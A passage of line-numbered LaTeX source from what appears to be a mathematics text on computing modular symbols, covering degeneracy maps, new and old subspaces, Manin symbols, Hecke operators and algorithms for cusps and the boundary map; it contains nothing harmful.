so\n437\\begin{align*}\n438\\beta_t(x)\n439 &= \\sum_{T\\gam_i\\in D_t}\n440 \\eps'(\\gam_i)^{-1}T\\gam_i{}\\eps'(\\gam)^{-1}\\gam{} x\\\\\n441 &= \\sum_{T\\gam_i\\gam\\in D_t}\n442 \\eps'(\\gam_i\\gam)^{-1}T\\gam_i{}\\gam{} x.\n443\\end{align*}\n444This computation shows that the definition of~$\\beta_t$\n445does not depend on the choice~$D_t$ of coset representatives.\n446To finish the proof that~$\\beta_t$ is well defined\n447we must show that, for $\\gam\\in\\Gamma_0(M)$, we have\n448$\\beta_t(\\gam x) = \\eps'(\\gam)\\beta_t(x)$ so that $\\beta_t$\n449respects the relations that define $\\sM_k(M,\\eps)$.\n450Using that~$\\beta_t$ does not depend on the choice of\n451coset representative, we find that for $\\gamma\\in\\Gamma_0(M)$,\n452\\begin{align*}\n453 \\beta_t(\\gam x)\n454 &= \\sum_{T\\gam_i\\in D_t} \\eps'(\\gam_i)^{-1}T\\gam_i{} \\gam{} x\\\\\n455 &= \\sum_{T\\gam_i\\gam^{-1}\\in D_t}\n456 \\eps'(\\gam_i\\gam^{-1})^{-1}T\\gam_i{}\\gam{}^{-1} \\gam{} x\\\\\n457 &= \\eps'(\\gam)\\beta_t(x).\\\\\n458\\end{align*}\n459To compute $\\alp_t\\circ\\beta_t$, we use\n460that $\\#D_t = [\\Gamma_0(N) : \\Gamma_0(M)]$:\n461\\begin{align*}\n462 \\alp_t(\\beta_t(x)) &=\n463 \\alp_t \\left(\\sum_{T\\gamma_i}\n464 \\eps'(\\gam_i)^{-1}T\\gam_i x\\right)\\\\\n465 &= \\sum_{T\\gamma_i}\n466 \\eps'(\\gam_i)^{-1}(tT^{-1})T\\gam_i x\\\\\n467 &= t^{k-2}\\sum_{T\\gamma_i}\n468 \\eps'(\\gam_i)^{-1}\\gam_i x\\\\\n469 &= t^{k-2}\\sum_{T\\gamma_i} x \\\\\n470 &= t^{k-2} \\cdot [\\Gamma_0(N) : \\Gamma_0(M)] \\cdot x.\n471\\end{align*}\n472The scalar factor of $t^{k-2}$ appears instead\n473of~$t$, because~$t$ is acting on~$x$ as an element of $\\GL_2(\\Q)$\n474{\\em not} as an an element of~$\\Q$.\n475\\end{proof}\n476\n477\\begin{definition}[New and old modular symbols]%\n478\\label{def:newandoldsymbols}%\n479\\index{New modular symbols|textit}%\n480\\index{Old modular symbols|textit}%\n481\\index{Modular symbols!new and old subspace of|textit}%\n482The subspace $\\sM_k(N,\\eps)^{\\new}$\n483of \\defn{new modular symbols} is the\n484intersection of the kernels of the $\\alp_t$ as~$t$\n485runs through all positive divisors of $N/M$ and~$M$\n486runs through positive divisors of~$M$ strictly less than~$N$\n487and divisible by the conductor of~$\\eps$.\n488The subspace $\\sM_k(N,\\eps)^{\\old}$\n489of \\defn{old modular symbols}\n490is the subspace generated by the images of the $\\beta_t$\n491where~$t$ runs through all positive divisors of $N/M$ and~$M$\n492runs through positive divisors of~$M$ strictly less than~$N$\n493and divisible by the conductor of~$\\eps$.\n494\\end{definition}\n495\n496{\\bf WARNING:} The new and old subspaces need not be disjoint, as\n497the following example illustrates!\n498This is contrary to the statement on page~80 of~\\cite{merel:1585}.\n499\\begin{example}\n500We justify the above warning.\n501Consider, for example, the case $N=6$, $k=2$, and trivial character.\n502The spaces $\\sM_2(2)$ and $\\sM_2(3)$ are each of dimension~$1$, and\n503each is generated by the modular symbol $\\{\\infty,0\\}$.\n504The space $\\sM_2(6)$ is of dimension~$3$, and is generated by\n505the~$3$ modular symbols $\\{\\infty, 0\\}$, $\\{-1/4, 0\\}$,\n506and $\\{-1/2, -1/3\\}$.\n507The space generated by the~$2$ images\n508of $\\sM_2(2)$ under the~$2$ degeneracy\n509maps has dimension~$2$, and likewise for $\\sM_2(3)$.\n510Together these images generate $\\sM_2(6)$, so $\\sM_2(6)$ is\n511equal to its old subspace.\n512However, the new subspace is nontrivial because\n513the two degeneracy maps $\\sM_2(6) \\ra \\sM_2(2)$ are equal,\n514as are the two degeneracy maps $\\sM_2(6) \\ra \\sM_2(3)$.\n515In particular, the intersection of the kernels of the degeneracy\n516maps has dimension at least~$1$ (in fact, it equals~$1$).\n517\n518Computationally, it appears that something similar to this happens\n519if and only if the weight is~$2$, the character is trivial,\n520and the level is composite. This behavior is probably related\n521to the nonexistence of a characteristic~$0$ Eisenstein series\n522of weight~$2$ and level~$1$.\n523\\end{example}\n524\n525The following tempting argument is incorrect;\n526the error lies in the fact that\n527an element of the old subspace\n528is a {\\em linear combination} of $\\beta_t(y)$'s\n529for various~$y$'s and~$t$'s:\n530If~$x$ is in both the new and old subspace,\n531then $x=\\beta_t(y)$ for some modular symbol~$y$\n532of lower level. This implies $x=0$ because\n533 $$0 = \\alp_t(x) = \\alp_t(\\beta_t(y))= 534t^{k-2}\\cdot[\\Gamma_0(N):\\Gamma_0(M)] \\cdot{}y.\\text{''}$$\n535\n536\n537\\begin{remark}\n538The map $\\beta_t\\circ\\alp_t$ cannot in general be multiplication by\n539a scalar since $\\sM_k(M,\\eps')$\n540usually has smaller dimension than $\\sM_k(N,\\eps)$.\n541\\end{remark}\n542\n543\\comment{\n544\\begin{example}\n545The proposition implies that $\\beta_t$ is injective in\n546characteristic~$0$. This need not be the case in positive\n547characteristic, as the following example illustrates.\n548Let~$p$ be any prime, and let $\\eps:(\\Z/N\\Z)^* \\ra 549\\Fbar_p^*$ be the reduction to characteristic~$p$\n550of a Dirichlet character.\n551There is again a map $\\beta_{t,p}:\\sM_k(M,\\eps';\\Fbar_p) \\ra 552\\sM_k(N,\\eps;\\Fbar_p)$, where the space $\\sM_k(N,\\eps;\\Fbar_p)$ is\n553defined by choosing a maximal ideal $\\wp$ lying over~$p$ in an\n554appropriate extension $\\O$ of~$\\Z$, and letting~$R=\\Fbar_p$\n555be an algebraic closure of the finite field~$\\O/\\wp$.\n556When~$p$\n557does not divide $t^{k-2}\\cdot [\\Gamma_0(M) : \\Gamma_0(N)]$, the\n558proposition shows that $\\beta_{t,p}$ is injective. However,\n559$\\beta_t\\tensor\\F_p$ need not be injective for all~$p$. For example,\n560suppose $M=14$, $N=28$, and $\\eps=1$. Then there are bases with\n561respect to which the matrix of $\\beta_1$ is the transpose of\n562$$\\left( 563\\begin{matrix} 5641&0&0&1&0&0&0&0&0\\\\ 565 0&1&0&0&1&0&0&0&0\\\\ 566 0&0&1&0&0&1&0&0&0\\\\ 567 0&0&0&0&0&0&2&1&-1\\\\ 568 0&0&0&0&0&0&0&1&1 569\\end{matrix} 570\\right),$$\n571and the row vector $(0,0,0,1,1)$ is in the kernel of the mod~$2$\n572reduction of this matrix.\n573\\end{example}\n574}\n575\n576\\subsection{Computing coset representatives}%\n577\\index{Coset representatives}\n578\\begin{definition}[Projective line mod~$N$]%\n579\\index{Projective line modulo~$N$|textit}%\n580Let~$N$ be a positive integer.\n581Then the \\defn{projective line}\n582$\\P^1(N)$ is the set of\n583pairs $(a,b)$, with $a, b\\in\\Z/N\\Z$ and $\\gcd(a,b,N)=1$, modulo\n584the eqivalence relation which identifies $(a,b)$ and $(a',b')$ if and only\n585if $ab'\\con ba'\\pmod{N}$.\n586\\end{definition}\n587\n588Let~$M$ be a positive divisor of~$N$ and~$t$ a\n589divisor of~$N/M$. The following {\\em random} algorithm\n590computes a set~$D_t$ of representatives for the orbit space\n591$\\Gamma_0(M)\\backslash T\\Gamma_0(N).$\n592There are deterministic algorithms for computing\n593$D_t$, but all of the ones the author has found are\n594{\\em vastly} less efficient than the following random algorithm.\n595\\begin{algorithm}\\label{alg:degenreps}%\n596\\index{Algorithm for computing!coset representatives}\n597 Let $\\Gamma_0(N/t,t)$ denote the subgroup of $\\SL_2(\\Z)$\n598consisting of matrices that are upper triangular modulo $N/t$ and lower\n599triangular modulo~$t$. Observe that two right cosets\n600 of $\\Gamma_0(N/t,t)$ in $\\SL_2(\\Z)$, represented by\n601$\\abcd{a}{b}{c}{d}$ and $\\abcd{a'}{b'}{c'}{d'}$,\n602are equivalent if and only if\n603$(a,b)=(a',b')$ as points of $\\P^1(t)$\n604and $(c,d)=(c',d')$ as points of $\\P^1(N/t)$.\n605Using the following algorithm, we compute right coset\n606representatives for $\\Gamma_0(N/t,t)$\n607inside~$\\Gamma_0(M)$.\n608\\begin{enumerate}\n609 \\item Compute the number $[\\Gamma_0(M):\\Gamma_0(N)]$ of cosets.\n610 \\item Compute a random element $x \\in \\Gamma_0(M)$.\n611 \\item If~$x$ is not equivalent to anything generated so\n612 far, add it to the list.\n613 \\item Repeat steps (2) and (3) until the list is as long\n614 as the bound of step (1).\n615\\end{enumerate}\n616There is a natural bijection between\n617 $\\Gamma_0(N)\\backslash T \\Gamma_0(M)$\n618and $\\Gamma_0(N/t,t)\\backslash \\Gamma_0(M)$,\n619under which~$T\\gamma$ corresponds to~$\\gamma$.\n620Thus we obtain coset representatives for\n621 $\\Gamma_0(N)\\backslash T\\Gamma_0(M)$\n622by left multiplying each\n623coset representative of $\\Gamma_0(N/t,t)\\backslash\\Gamma_0(M)$ by~$T$.\n624\\end{algorithm}\n625\n626\\subsection{Compatibility with modular forms}%\n627\\index{Degeneracy maps!compatibility}%\n628The degeneracy maps defined above\n629are compatible with the corresponding degeneracy maps\n630$\\tilde{\\alp}_t$ and $\\tilde{\\beta}_t$\n631on modular forms\\index{Modular forms}. This is because the degeneracy\n632maps on modular forms are defined by summing over the\n633same coset representatives $D_t$.\n634Thus we have the following compatibilities.\n635\\begin{align*}\n636 \\langle \\tilde{\\alp}_t(f), x \\rangle &= \\langle f, \\alp_t(x)\\rangle,\\\\\n637 \\langle \\tilde{\\beta}_t(f), x\\rangle &= \\langle f, \\beta_t(x) \\rangle .\n638\\end{align*}\n639If~$p$ is prime to~$N$, then $T_p\\alp_t = \\alp_t T_p$\n640 and $T_p\\beta_t = \\beta_t T_p$.\n641\n642\\section{Manin symbols}%\n643\\label{sec:maninsymbols}%\n644\\index{Manin symbols}%\n645From the definition given in\n646Section~\\ref{sec:defnofmodsyms}, it is not obvious\n647that $\\sM_k(N,\\eps)$ is of finite rank. The Manin\n648symbols provide a finite presentation of~$\\sM_k(N,\\eps)$\n649that is vastly more useful from a computational point of view.\n650\\index{Modular symbols!finite presentation of}\n651\n652\\begin{definition}[Manin symbols]\\label{defn:maninsymbols}%\n653\\index{Manin symbols|textit}%\n654The \\defn{Manin symbols} are the set of pairs\n655 $$[P(X,Y),(u,v)]$$\n656where $P(X,Y)\\in V_{k-2}$ and\n657$0\\leq u,v < N$ with $\\gcd(u,v,N)=1$.\n658\\end{definition}\n659Define a {\\em right} action of $\\GL_2(\\Q)$ on\n660the free $\\Z[\\eps]$-module~$M$ generated by the Manin\n661symbols as follows. The element $g=\\abcd{a}{b}{c}{d}$ acts by\n662\\begin{equation*}\n663[P,(u,v)]g=[g^{-1}P(X,Y),(u,v) g]\n664 = [P(aX+bY,cX+dY),(au+cv,bu+dv)].\n665\\end{equation*}\n666Let $\\sigma=\\abcd{0}{-1}{1}{\\hfill 0}$ and $\\tau=\\abcd{0}{-1}{1}{-1}$\\label{defn:sigmatau}.\n667Let $\\sM_k(N,\\eps)'$ be the largest torsion-free quotient\n668of~$M$ by the relations\n669\\begin{align*}\n670\\mbox{}x + x\\sigma &= 0,\\\\\n671\\mbox{}x + x\\tau+ x\\tau^2 &= 0,\\\\\n672 \\eps(\\lambda) [P,(u,v)]- [P,(\\lambda u, \\lambda v)] &=0.\n673\\end{align*}\n674\n675\\begin{theorem}\\label{thm:maninsymbols}\n676There is a natural isomorphism\n677$\\vphi:\\sM_k(N,\\eps)'\\lra\\sM_k(N,\\eps)$ given by\n678$$[X^iY^{2-k-i},(u,v)] \\mapsto g(X^iY^{k-2-i}\\{ 0,\\infty\\})$$\n679where $g=\\abcd{a}{b}{c}{d}\\in\\SL_2(\\Z)$ is any matrix\n680such that $(u,v)\\con (c,d) \\pmod{N}$.\n681\\end{theorem}\n682\\begin{proof}\n683In~\\cite[\\S1.2, \\S1.7]{merel:1585} it is proved that\n684$\\vphi\\tensor_{\\Z[\\eps]}\\C$ is\n685an isomorphism, so~$\\vphi$ is injective and well defined.\n686The discussion in Section~\\ref{sec:modmanconv} below\n687(Manin's trick'')\\index{Manin's trick}\\index{Manin symbols!and Manin's trick}\n688shows that every element in $\\sM_k(N,\\eps)$ is a $\\Z[\\eps]$-linear\n689combination of elements in the image, so~$\\vphi$ is surjective as well.\n690\\end{proof}\n691\n692\\subsection{Conversion between modular and Manin symbols}%\n693\\index{Manin symbols!conversion to modular symbols}%\n694\\index{Modular symbols!conversion to Manin symbols}%\n695\\label{sec:modmanconv}%\n696For some purposes it is better to work with modular symbols, and for\n697others it is better to work with Manin symbols. For example, there\n698are descriptions of the Atkin-Lehner involution\\index{Atkin-Lehner involution}\n699in terms of both Manin\n700and modular symbols; it appears more efficient to compute this\n701involution using modular symbols. On the other hand, practically\n702Hecke operators can be computed more efficiently using Manin symbols.\n703It is thus essential to be able to convert between these two\n704representations. The conversion from Manin to modular symbols is\n705straightforward, and follows immediately from\n706Theorem~\\ref{thm:maninsymbols}. The conversion back is accomplished\n707using the method used to prove Theorem~\\ref{thm:maninsymbols}; it is\n708known as Manin's trick'',\\index{Manin's trick|textit}\\index{Manin!trick of|textit} and involves continued fractions\\index{Continued fractions}.\n709\n710Given a Manin symbol $[X^iY^{k-2-i},(u,v)]$\\index{Manin symbols},\n711we write down a corresponding modular symbol\\index{Modular symbols}\n712as follows.\n713Choose $\\abcd{a}{b}{c}{d}\\in\\SL_2(\\Z)$ such that\n714$(c,d)\\con (u,v)\\pmod{N}$. This is possible\n715by Lemma~1.38 of~\\cite[pg.~20]{shimura:intro}; in practice,\n716finding $\\abcd{a}{b}{c}{d}$ is not completely trivial, but\n717can be accomplished using the extended Euclidean\n718algorithm.\n719Then\n720 \\begin{eqnarray*}\n721 [X^iY^{k-2-i},(u,v)] &\\corrto&\n722 \\abcd{a}{b}{c}{d}(X^iY^{k-2-i}\\{ 0,\\infty\\})\\\\\n723 &&= (dX-bY)^i(-cX+aY)^{2-k-i}\n724 \\left\\{\\frac{b}{d},\\,\\frac{a}{c}\\right\\}.\\\\\n725\\end{eqnarray*}\n726\n727In the other direction, suppose that we are given a modular\n728symbol $P(X,Y)\\{\\alp,\\beta\\}$ and wish to represent it as a\n729sum of Manin symbols. Because\n730 $$P\\{a/b,c/d\\} = P\\{a/b,0\\}+P\\{0,c/d\\},$$\n731it suffices to write $P\\{0,a/b\\}$ in\n732terms of Manin symbols.\n733Let\n734$$0=\\frac{p_{-2}}{q_{-2}} = \\frac{0}{1},\\,\\, 735\\frac{p_{-1}}{q_{-1}}=\\frac{1}{0},\\,\\, 736\\frac{p_0}{1}=\\frac{p_0}{q_0},\\,\\, 737\\frac{p_1}{q_1},\\,\\, 738\\frac{p_2}{q_2},\\,\\ldots,\\,\\frac{p_r}{q_r}=\\frac{a}{b}$$\n739denote the continued fraction convergents of the\n740rational number $a/b$.\n741Then\n742$$p_j q_{j-1} 743 - p_{j-1} q_j = (-1)^{j-1}\\qquad \\text{for }-1\\leq j\\leq r.$$\n744If we let\n745$g_j = \\mtwo{(-1)^{j-1}p_j}{p_{j-1}}{(-1)^{j-1}q_j}{q_{j-1}}$,\n746then $g_j\\in\\sltwoz$ and\n747\\begin{align*}\n748 P(X,Y)\\{0,a/b\\}\n749 &=P(X,Y)\\sum_{j=-1}^{r}\\left\\{\\frac{p_{j-1}}{q_{j-1}},\\frac{p_j}{q_j}\\right\\}\\\\\n750 &=\\sum_{j=-1}^{r} g_j((g_j^{-1}P(X,Y))\\{0,\\infty\\})\\\\\n751 &=\\sum_{j=-1}^{r} [g_j^{-1}P(X,Y),((-1)^{j-1}q_j,q_{j-1})].\n752\\end{align*}\n753Note that in the $j$th summand, $g_j^{-1}P(X,Y)$, replaces $P(X,Y)$.\n754Since $g_j\\in\\sltwoz$ and $P(X,Y)$ has integer coefficients,\n755the polynomial $g_j^{-1}P(X,Y)$ also has integer coefficients,\n756so no denominators are introduced.\n757\n758The continued fraction expansion $[c_1,c_2,\\ldots,c_n]$\n759of the rational number $a/b$ can be computed\n760using the Euclidean algorithm.\n761The first term, $c_1$, is the quotient'': $a = bc_1+r$,\n762with $0\\leq r < b$.\n763Let $a'=b$, $b'=r$ and compute $c_2$ as\n764$a'=b'c_2+r'$, etc., terminating when the\n765remainder is $0$. For example, the expansion\n766of $5/13$ is $[0,2,1,1,2]$.\n767The numbers $$d_i=c_1+\\frac{1}{c_2+\\frac{1}{c_3+\\cdots}}$$\n768will then be the (finite) convergents.\n769For example if $a/b=5/13$, then the convergents are\n770 $$0/1,\\,\\, 1/0,\\,\\, d_1=0,\\,\\, d_2=\\frac{1}{2},\\,\\, d_3=\\frac{1}{3},\\,\\, 771 d_4=\\frac{2}{5},\\,\\, d_5=\\frac{5}{13}.$$\n772\n773\n774\n775\\subsection{Hecke operators on Manin symbols}%\n776\\index{Hecke operators!on Manin symbols}%\n777\\index{Manin symbols!and Hecke operators}%\n778\\label{subsec:heckeonmanin}%\n779Thoerem~2 of \\cite{merel:1585} gives a description of\n780the Hecke operators~$T_n$\n781directly on the space of Manin symbols.\n782This avoids the expense of first converting a Manin\n783symbol to a modular symbol, computing~$T_n$ on the modular symbol,\n784and then converting back. For the reader's convenience, we very\n785briefly recall Merel's\\index{Merel} theorem here, along with\n786an enhancement due to Cremona\\index{Cremona}.\n787\n788As in~\\cite[\\S2.4]{cremona:algs}, define~$R_p$ as follows.\n789When $p=2$,\n790$$R_2 := \\left\\{\\mtwo{1}{0}{0}{2}, 791 \\mtwo{2}{0}{0}{1}, \\mtwo{2}{1}{0}{1}, 792 \\mtwo{1}{0}{1}{2}\\right\\}.$$\n793When~$p$ is odd,~$R_p$ is the set of $2\\times 2$ integer\n794matrices $\\abcd{a}{b}{c}{d}$ with determinant~$p$, and either\n795\\begin{enumerate}\n796\\item $a>|b|>0$, $d>|c|>0$, and $bc<0$; or\n797\\item $b=0$, and $|c|<d/2$; or\n798\\item $c=0$, and $|b|<a/2$.\n799\\end{enumerate}\n800\\begin{proposition}\n801For $[P(X,Y),(u,v)]\\in\\sM_k(N,\\eps)$ and~$p$ a prime, we have\n802\\begin{align*}T_p([P(X,Y),(u,v)])\n803 &= \\sum_{g\\in R_p} [P(X,Y),(u,v)].g \\\\\n804 &= \\sum_{\\abcd{a}{b}{c}{d}\\in R_p} [P(aX+bY,cX+dY),(au+cv,bu+dv)],\n805\\end{align*}\n806where the sum is restricted to matrices $\\abcd{a}{b}{c}{d}$\n807such that $\\gcd(au+cv,bu+dv,N)=1$.\n808\\end{proposition}\n809\\begin{proof}\n810For the case $k=2$ and an algorithm to compute $R_p$,\n811see \\cite[\\S2.4]{cremona:algs}.\n812The general case follows from~\\cite[Theorem 2]{merel:1585} applied\n813to the set~$\\sS$ of~\\cite[\\S3]{merel:1585} by observing that\n814when~$p$ is an odd {\\em prime} $\\sS_p'$ is empty.\n815\\end{proof}\n816\n817\\subsection{The cuspidal and boundary spaces in terms of Manin symbols}%\n818\\index{Manin symbols!and cuspidal subspace}%\n819\\index{Manin symbols!and boundary space}%\n820\\index{Cuspidal modular symbols!and Manin symbols}%\n821\\index{Boundary modular symbols!and Manin symbols}%\n822This section is a review of Merel's\\index{Merel} explicit description\n823of the boundary map in terms of Manin symbols\\index{Manin symbols}\n824for $\\Gamma=\\Gamma_1(N)$\n825(see~\\cite[\\S1.4]{merel:1585}). In the next section, we\n826describe a very efficient way to compute the boundary map.\n827\n828Let~$\\cR$ be the equivalence relation\n829on $\\Gamma\\backslash\\Q^2$ which identifies\n830the element\n831$[\\Gamma\\smallvtwo{\\lambda u}{\\lambda v}]$\n832with $\\sign(\\lambda)^k[\\Gamma\\smallvtwo{u}{v}]$,\n833for any $\\lambda\\in\\Q^*$. Denote by $B_k(\\Gamma)$\n834the finite dimensional $\\Q$-vector space\n835with basis the equivalence classes\n836$(\\Gamma\\backslash\\Q^2)/\\cR$.\n837The dimension of this space is $\\#(\\Gamma\\backslash\\P^1(\\Q))$.\n838\\begin{proposition}\n839The map\n840$$\\mu:\\sB_k(\\Gamma)\\ra B_k(\\Gamma), 841\\qquad P\\left\\{\\frac{u}{v}\\right\\}\\mapsto 842 P(u,v)\\left[\\Gamma\\vtwo{u}{v}\\right]$$\n843is well defined and injective.\n844Here $u$ and $v$ are assumed coprime.\n845\\end{proposition}\n846Thus the kernel of $\\delta:\\sS_k(\\Gamma)\\ra \\sB_k(\\Gamma)$\n847is the same as the kernel of $\\mu\\circ \\delta$.\n848\\begin{proposition}\\label{prop:boundary}\n849Let $P\\in V_{k-2}$ and $g=\\abcd{a}{b}{c}{d}\\in\\sltwoz$. We have\n850$$\\mu\\circ\\delta([P,(c,d)]) 851 = P(1,0)[\\Gamma\\smallvtwo{a}{c}] 852 -P(0,1)[\\Gamma\\smallvtwo{b}{d}].$$\n853\\end{proposition}\n854\n855\n856\\subsection{Computing the boundary map}%\n857\\index{Boundary map}%\n858\\label{sec:computeboundary}%\n859In this section we describe how to compute the\n860map $\\delta:\\sM_k(N,\\eps)\\ra B_k(N,\\eps)$\n861given in the previous section.\n862The algorithm presented here\n863generalizes the one in~\\cite[\\S2.2]{cremona:algs}.\n864To compute the image of $[P,(c,d)]$, with\n865$g=\\abcd{a}{b}{c}{d}\\in\\sltwoz$,\n866we must compute the class of $[\\smallvtwo{a}{c}]$ and of\n867$[\\smallvtwo{b}{d}]$.\n868Instead of finding a canonical form for cusps, we\n869use a quick test for equivalence modulo scalars.\n870In the following algorithm, by the $i$th standard\n871cusp\\index{Cusps!and boundary map} we mean\n872the $i$th basis vector for a basis of $B_k(N,\\eps)$. The\n873basis is constructed as the algorithm is called successively.\n874We first give the algorithm, then prove the facts\n875used by the algorithm in testing equivalence.\n876\n877\\begin{algorithm}\\label{alg:cusplist}\n878\\index{Algorithm for computing!cusps}\n879Given a cusp $[\\smallvtwo{u}{v}]$ this algorithm computes an\n880integer~$i$ and a scalar~$\\alp$ such that $[\\smallvtwo{u}{v}]$ is\n881equivalent to~$\\alp$ times the $i$th standard cusp. First, using\n882Proposition~\\ref{prop:cusp1} and Algorithm~\\ref{alg:cusp1}, check\n883whether or not $[\\smallvtwo{u}{v}]$ is equivalent, modulo scalars, to\n884any cusp found so far. If so, return the index of the representative\n885and the scalar. If not, record $\\smallvtwo{u}{v}$ in the\n886representative list. Then, using Proposition~\\ref{prop:cuspdies},\n887check whether or not $\\smallvtwo{u}{v}$ is forced to equal zero by the\n888relations. If it does not equal zero, return its position in the list\n889and the scalar~$1$. If it equals zero, return the scalar~$0$ and the\n890position~$1$; keep $\\smallvtwo{u}{v}$ in the list, and record that it\n891is zero.\n892\\end{algorithm}\n893\n894In the case considered in Cremona's book \\cite{cremona:algs}, the\n895relations between cusps involve only the trivial character, so they do\n896not force any cusp classes to vanish. Cremona gives the following two\n897criteria for equivalence.\n898\\begin{proposition}[Cremona]\\label{prop:cusp1}\\index{Cremona}\n899Let $\\smallvtwo{u_i}{v_i}$, $i=1,2$ be written so that\n900$\\gcd(u_i,v_i)=1$.\n901\\begin{enumerate}\n902\\item There exists $g\\in\\Gamma_0(N)$ such that\n903 $g\\smallvtwo{u_1}{v_1}=\\smallvtwo{u_2}{v_2}$ if and only if\n904 $$s_1 v_2 \\con s_2 v_1 \\pmod{\\gcd(v_1 v_2,N)},\\, 905\\text{ where s_j satisfies u_j s_j\\con 1\\pmod{v_j}}.$$\n906\\item There exists $g\\in\\Gamma_1(N)$ such that\n907 $g\\smallvtwo{u_1}{v_1}=\\smallvtwo{u_2}{v_2}$ if and only if\n908 $$v_2 \\con v_1 \\pmod{N}\\text{ and } u_2 \\con u_1 \\pmod{\\gcd(v_1,N)}.$$\n909\\end{enumerate}\n910\\end{proposition}\n911\\begin{proof}\n912The first is Proposition 2.2.3 of \\cite{cremona:algs}, and\n913the second is Lemma 3.2 of \\cite{cremona:gammaone}.\n914\\end{proof}\n915\n916\\begin{algorithm}\\label{alg:cusp1}%\n917\\index{Algorithm for computing!equivalent cusps}%\n918Suppose $\\smallvtwo{u_1}{v_1}$ and\n919$\\smallvtwo{u_2}{v_2}$\n920are equivalent modulo $\\Gamma_0(N)$.\n921This algorithm computes a matrix $g\\in\\Gamma_0(N)$ such\n922that $g\\smallvtwo{u_1}{v_1}=\\smallvtwo{u_2}{v_2}$.\n923Let $s_1, s_2, r_1, r_2$ be solutions to\n924$s_1 u_1 -r_1 v_1 =1$ and\n925$s_2 u_2 -r_2 v_2 =1$.\n926Find integers $x_0$ and $y_0$ such\n927that $x_0v_1v_2+y_0N=1$.\n928Let $x=-x_0(s_1v_2-s_2v_1)/(v_1v_2,N)$\n929and $s_1' = s_1 + xv_1$.\n930Then $g=\\mtwo{u_2}{r_2}{v_2}{s_2} 931 \\cdot \\mtwo{u_1}{r_1}{v_1}{s_1'}^{-1}$\n932sends $\\smallvtwo{u_1}{v_1}$ to $\\smallvtwo{u_2}{v_2}$.\n933\\end{algorithm}\n934\\begin{proof}\n935This follows from the proof of Proposition~\\ref{prop:cusp1} in\n936\\cite{cremona:algs}.\n937\\end{proof}\n938\n939\n940To see how the~$\\eps$ relations, for nontrivial~$\\eps$,\n941make the situation more complicated, observe that it is\n942possible that $\\eps(\\alp)\\neq \\eps(\\beta)$ but\n943$$\\eps(\\alp)\\left[\\vtwo{u}{v}\\right] =\\left[\\gamma_\\alp \\vtwo{u}{v}\\right]= 944 \\left[\\gamma_\\beta \\vtwo{u}{v}\\right]=\\eps(\\beta)\\left[\\vtwo{u}{v}\\right];$$\n945One way out of this difficulty is to construct\n946the cusp classes for $\\Gamma_1(N)$, then quotient\n947out by the additional~$\\eps$ relations using\n948Gaussian elimination. This is far too\n949inefficient to be useful in practice because the number of\n950$\\Gamma_1(N)$ cusp classes can be unreasonably large.\n951Instead, we give a quick test to determine whether or not\n952a cusp vanishes modulo the $\\eps$-relations.\n953\n954\\begin{lemma}\\label{lem:canlift}\n955Suppose $\\alp$ and $\\alp'$ are integers\n956such that $\\gcd(\\alp,\\alp',N)=1$.\n957Then there exist integers $\\beta$ and $\\beta'$,\n958congruent to $\\alp$ and $\\alp'$ modulo $N$, respectively,\n959 such that $\\gcd(\\beta,\\beta')=1$.\n960\\end{lemma}\n961\\begin{proof}\n962By \\cite[1.38]{shimura:intro} the map\n963$\\SL_2(\\Z)\\ra\\SL_2(\\Z/N\\Z)$ is surjective.\n964By the Euclidean algorithm, there exist\n965integers $x$, $y$ and $z$ such that\n966$x\\alp + y\\alp' + zN = 1$.\n967Consider the matrix\n968$\\abcd{y}{-x}{\\alp}{\\hfill\\alp'}\\in \\SL_2(\\Z/N\\Z)$\n969and take $\\beta$, $\\beta'$ to be the bottom\n970row of a lift of this matrix to $\\SL_2(\\Z)$.\n971\\end{proof}\n972\n973\\begin{proposition}\\label{prop:cuspdies}\\index{Cusps!criterion for vanishing}\n974Let~$N$ be a positive integer and~$\\eps$ a Dirichlet\n975character\\index{Dirichlet character!and cusps} of modulus~$N$.\n976Suppose $\\smallvtwo{u}{v}$ is a cusp with $u$ and $v$ coprime.\n977Then $\\smallvtwo{u}{v}$ vanishes modulo the relations\n978$$\\left[\\gamma\\smallvtwo{u}{v}\\right]= 979\\eps(\\gamma)\\left[\\smallvtwo{u}{v}\\right],\\qquad 980\\text{all \\gamma\\in\\Gamma_0(N)}$$\n981if and only if there exists $\\alp\\in(\\Z/N\\Z)^*$,\n982with $\\eps(\\alp)\\neq 1$, such that\n983\\begin{align*}\n984 v &\\con \\alp v \\pmod{N},\\\\\n985 u &\\con \\alp u \\pmod{\\gcd(v,N)}.\n986\\end{align*}\n987\\end{proposition}\n988\\begin{proof}\n989First suppose such an~$\\alp$ exists.\n990By Lemma~\\ref{lem:canlift}\n991there exists $\\beta, \\beta'\\in\\Z$ lifting\n992$\\alp,\\alp^{-1}$ such that $\\gcd(\\beta,\\beta')=1$.\n993The cusp $\\smallvtwo{\\beta u}{\\beta' v}$\n994has coprime coordinates so,\n995by Proposition~\\ref{prop:cusp1} and our\n996congruence conditions on~$\\alp$, the cusps\n997$\\smallvtwo{\\beta{}u}{\\beta'{}v}$\n998and $\\smallvtwo{u}{v}$ are equivalent by\n999an element of $\\Gamma_1(N)$.\n1000This implies that $\\left[\\smallvtwo{\\beta{}u}{\\beta'{}v}\\right] 1001 =\\left[\\smallvtwo{u}{v}\\right]$.\n1002Since $\\left[\\smallvtwo{\\beta{}u}{\\beta'{}v}\\right] 1003 = \\eps(\\alp)\\left[\\smallvtwo{u}{v}\\right]$,\n1004our assumption that $\\eps(\\alp)\\neq 1$\n1005forces $\\left[\\smallvtwo{u}{v}\\right]=0$.\n1006\n1007Conversely, suppose $\\left[\\smallvtwo{u}{v}\\right]=0$.\n1008Because all relations are two-term relations, and the\n1009$\\Gamma_1(N)$-relations identify $\\Gamma_1(N)$-orbits,\n1010there must exists $\\alp$ and $\\beta$ with\n1011 $$\\left[\\gamma_\\alp \\vtwo{u}{v}\\right] 1012 =\\left[\\gamma_\\beta \\vtwo{u}{v}\\right] 1013 \\qquad\\text{ and }\\eps(\\alp)\\ne \\eps(\\beta).$$\n1014Indeed, if this did not occur,\n1015then we could mod out by the $\\eps$ relations by writing\n1016each $\\left[\\gamma_\\alp \\smallvtwo{u}{v} \\right]$\n1017in terms of $\\left[\\smallvtwo{u}{v}\\right]$, and there would\n1018be no further relations left to kill\n1019$\\left[\\smallvtwo{u}{v}\\right]$.\n1020Next observe that\n1021$$1022\\left[\\gamma_{\\beta^{-1}\\alp} 1023 \\vtwo{u}{v}\\right] 1024 = \\left[\\gamma_{\\beta^{-1}}\\gamma_\\alp 1025 \\vtwo{u}{v}\\right] 1026 = 